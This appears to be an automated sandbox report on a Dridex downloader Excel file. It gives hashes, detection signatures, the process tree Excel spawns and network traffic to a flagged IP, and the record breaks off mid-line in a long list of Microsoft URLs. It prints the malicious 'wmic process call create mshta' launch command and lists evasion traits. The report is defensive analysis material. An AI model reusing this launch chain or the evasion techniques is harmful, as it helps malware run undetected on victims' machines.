Windows Analysis Report order 4544471372.xls

Overview

General Information

Sample Name: order 4544471372.xls
Analysis ID: 532575
MD5: 531039a455e1f0598cd201b785a1152a
SHA1: 4880df9e94090243029e54a34e941c70298401c7
SHA256: cf0d6ea61f8e56f80f24792e356adeab2f92b6db2f980a9e5932415484f5b732
Tags: Dridex, xlsx

Detection

Hidden Macro 4.0 Dridex Downloader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Sigma detected: TA505 Dropper Load Pattern
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Contains functionality to detect virtual machines (SLDT)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Launches processes in debugging mode, may be used to hinder debugging
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 2804 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • WMIC.exe (PID: 5572 cmdline: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf" MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • WmiPrvSE.exe (PID: 5344 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • mshta.exe (PID: 6096 cmdline: mshta C:\ProgramData\tCeltZ.rtf MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
--- | --- | --- | --- | ---
app.xml | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |

Dropped Files

Source | Rule | Description | Author | Strings
--- | --- | --- | --- | ---
C:\ProgramData\tCeltZ.rtf | JoeSecurity_DridexDownloader | Yara detected Dridex Downloader | Joe Security |

Sigma Overview

System Summary:

Sigma detected: TA505 Dropper Load Pattern
Source: Process started; Author: Florian Roth; Data: Command: mshta C:\ProgramData\tCeltZ.rtf, CommandLine: mshta C:\ProgramData\tCeltZ.rtf, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding, ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe, ParentProcessId: 5344, ProcessCommandLine: mshta C:\ProgramData\tCeltZ.rtf, ProcessId: 6096

Sigma detected: Suspicious MSHTA Process Patterns
Source: Process started; Author: Florian Roth; Data: Command: mshta C:\ProgramData\tCeltZ.rtf, CommandLine: mshta C:\ProgramData\tCeltZ.rtf, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding, ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe, ParentProcessId: 5344, ProcessCommandLine: mshta C:\ProgramData\tCeltZ.rtf, ProcessId: 6096

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2804, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf", ProcessId: 5572

Sigma detected: Suspicious WMI Execution
Source: Process started; Author: Michael Haag, Florian Roth, juju4, oscd.community; Data: Command: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2804, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf", ProcessId: 5572

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: order 4544471372.xls, ReversingLabs: Detection: 13%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\wbem\WMIC.exe
Source: global traffic, TCP traffic: 192.168.2.7:49816 -> 149.129.254.152:8080
Source: Joe Sandbox View, IP Address: 149.129.254.152
Source: unknown, TCP traffic detected without corresponding DNS query: 149.129.254.152
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comhttps://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnosticssdf.office.comMix
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/StreamVideoBasehttps://web.microsoftstream.com/video/PPTQuickSta
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/nt
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.office.net
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net$
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net?
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netH
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netU
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netf
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://api.office.neto
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.onedrive.com
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://api.onedrive.comMBI
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://api.onedrive.comce
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets)
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups-
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groupsBearer
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://apis.live.net/v5.0/rl
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/Gzu
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/OneNoteBulletinshttps://
      Source: EXCEL.EXE, 00000000.00000003.260270306.0000000012FD9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://augloop.office.com
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2Bearer
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2https://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.
      Source: EXCEL.EXE, 00000000.00000003.414564418.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.541998187.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.349622287.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://cdn.entity.
      Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: EXCEL.EXE, 00000000.00000003.349574960.000000000F536000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.411656756.000000000F537000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.414512357.000000000F537000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.541923673.000000000F537000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.pngW
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsellSkyDriveSignUpUpsellImageht
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsellLiveProfileServicehttps
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://clients.config.office.net/
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/Bearer
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/https://login.windows.net/common/oauth2/authorize
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policiesE
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policieshttps://login.windows.net/common/oauth2/
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosBearer
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: 